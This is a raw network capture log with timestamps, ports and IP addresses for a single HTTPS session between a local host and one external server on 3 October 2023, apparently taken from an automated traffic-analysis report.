Oct 3, 2023 22:34:59.270505905 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.271157980 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.271207094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.271246910 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.271256924 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.271290064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.271312952 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.272103071 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.272156000 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.272198915 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.272209883 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.272237062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.272267103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.275391102 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.275439978 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.275487900 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.275497913 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.275526047 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.275567055 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.276985884 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277039051 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277086020 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.277096033 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277127028 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.277151108 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.277808905 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277853012 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277889967 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.277899981 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.277937889 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.277960062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.278624058 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.278669119 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.278711081 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.278721094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.278758049 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.278779984 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.279598951 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.279648066 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.279717922 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.279728889 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.279781103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.279781103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.280400038 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.280441046 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.280476093 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.280487061 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.280514002 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.280541897 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.281383038 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.281424999 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.281461954 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.281471968 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.281502962 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.281528950 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.282607079 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.282649994 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.282684088 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.282695055 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.282731056 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.282748938 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.283678055 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.283719063 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.283765078 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.283776045 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.283814907 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.283833981 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.284657955 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.284698963 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.284733057 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.284743071 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.284785032 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.284805059 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.285962105 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.286011934 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.286050081 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.286060095 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.286097050 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.286120892 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.287005901 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.287046909 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.287081003 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.287091017 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.287123919 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.287143946 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.289191961 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.289232016 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.289284945 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.289294958 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.289330959 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.289354086 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.290143967 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.290189981 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.290237904 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.290247917 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.290278912 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.290306091 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.291299105 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.291351080 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.291399956 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.291410923 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.291436911 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.291471958 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.292259932 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.292305946 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.292354107 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.292365074 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.292391062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.292419910 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.293162107 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.293214083 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.293251991 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.293262959 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.293292046 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.293324947 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.293952942 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.293992043 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.294037104 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.294047117 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.294086933 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.294111013 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.294862032 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.294912100 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.294950962 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.294960976 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.295001984 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.295028925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.295638084 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.295681953 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.295717955 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.295727968 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.295758009 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.295785904 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.296561003 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.296602011 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.296639919 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.296649933 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.296694040 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.296710014 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.297468901 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.297509909 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.297548056 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.297559023 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.297591925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.297614098 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.298718929 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.298764944 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.298809052 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.298819065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.298861027 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.298881054 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.299638987 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.299680948 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.299746037 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.299757004 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.299798965 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.299815893 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.300549984 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.300569057 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.300620079 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.300631046 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.300673008 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.300692081 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.301480055 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.301510096 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.301568031 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.301578045 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.301616907 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.301640987 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.301656008 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.321732044 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.321760893 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.322091103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.322149992 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.322243929 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.322469950 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.322499037 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.322685003 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.322685957 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.322747946 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.322822094 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.323312998 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.323339939 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.323390961 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.323405027 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.323440075 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.323468924 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.347934961 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.347971916 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.348165989 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.348166943 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.348228931 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.348316908 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.349164963 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.349227905 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.349319935 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.349333048 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.349361897 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.349395990 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.350794077 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.350825071 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.350891113 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.350903034 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.350929976 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.350971937 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.352204084 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.352241993 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.352286100 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.352298021 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.352328062 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.352356911 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.353457928 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.353553057 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.353609085 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.353620052 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.353645086 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.353673935 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.354175091 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.354197979 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.354249001 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.354259968 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.354326963 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.354345083 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.355099916 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.355120897 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.355187893 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.355201006 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.355262041 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.356621027 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.356642008 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.356776953 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.356787920 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.356825113 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.356848001 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.357930899 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.357952118 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.358011961 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.358021975 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.358048916 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.358077049 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.359550953 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.359575987 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.359658003 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.359668016 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.359698057 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.359726906 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.360610008 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.360637903 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.360696077 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.360706091 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.360733032 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.360769033 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.361691952 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.361711025 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.361782074 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.361793041 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.361849070 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.363111973 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.363132000 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.363188982 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.363199949 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.363225937 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.363253117 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.364665985 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.364687920 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.364746094 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.364757061 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.364784002 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.364805937 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.366101027 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.366125107 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.366184950 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.366195917 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.366221905 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.366245985 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367125988 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367155075 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367213964 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367224932 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367252111 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367275953 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367850065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367873907 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367923975 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367933989 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.367964983 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.367984056 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.368546963 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.368576050 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.368629932 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.368640900 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.368666887 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.368702888 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.369549990 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.369570017 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.369638920 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.369651079 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.369683981 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.369718075 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.370714903 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.370735884 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.370793104 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.370804071 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.370836020 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.370856047 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.371934891 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.371957064 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.372024059 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.372034073 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.372062922 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.372085094 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.372992039 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.373012066 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.373068094 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.373079062 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.373104095 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.373145103 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.374058008 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.374078035 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.374134064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.374144077 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.374182940 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.374207020 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.375003099 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.375025034 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.375080109 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.375091076 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.375118017 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.375148058 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.376477003 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.376496077 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.376554966 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.376565933 CEST	443	49776	136.144.57.121	192.168.2.4
